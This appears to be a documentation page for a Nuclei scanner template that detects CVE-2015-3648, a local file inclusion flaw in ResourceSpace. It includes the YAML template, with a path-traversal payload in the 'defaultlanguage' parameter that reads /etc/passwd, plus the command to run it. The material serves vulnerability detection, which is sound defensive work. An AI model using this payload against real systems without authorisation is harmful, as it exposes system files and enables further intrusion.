ResourceSpace - Local File inclusion
ID: CVE-2015-3648
Severity: high
Author: pikpikcu
Tags: cve2015,cve,lfi,resourcespace,packetstorm,montala
Description
Section titled “Description”ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.
YAML Source
Section titled “YAML Source”id: CVE-2015-3648
info: name: ResourceSpace - Local File inclusion author: pikpikcu severity: high description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. impact: | An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability. reference: - https://vulners.com/cve/CVE-2015-3648/ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738 - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3648 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-3648 cwe-id: CWE-22 epss-score: 0.02644 epss-percentile: 0.90124 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: montala product: resourcespace tags: cve2015,cve,lfi,resourcespace,packetstorm,montala
http: - method: GET path: - "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a004730450220677df58ddc703ebeff63508439c2c288b5085fc83ed2ec122ea5b1a81f15cfbd022100a1a1bd172b9784acb124233e2b4da44e9260d3a9b7cd0cc7e31513f0526ce563:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-3648.yaml"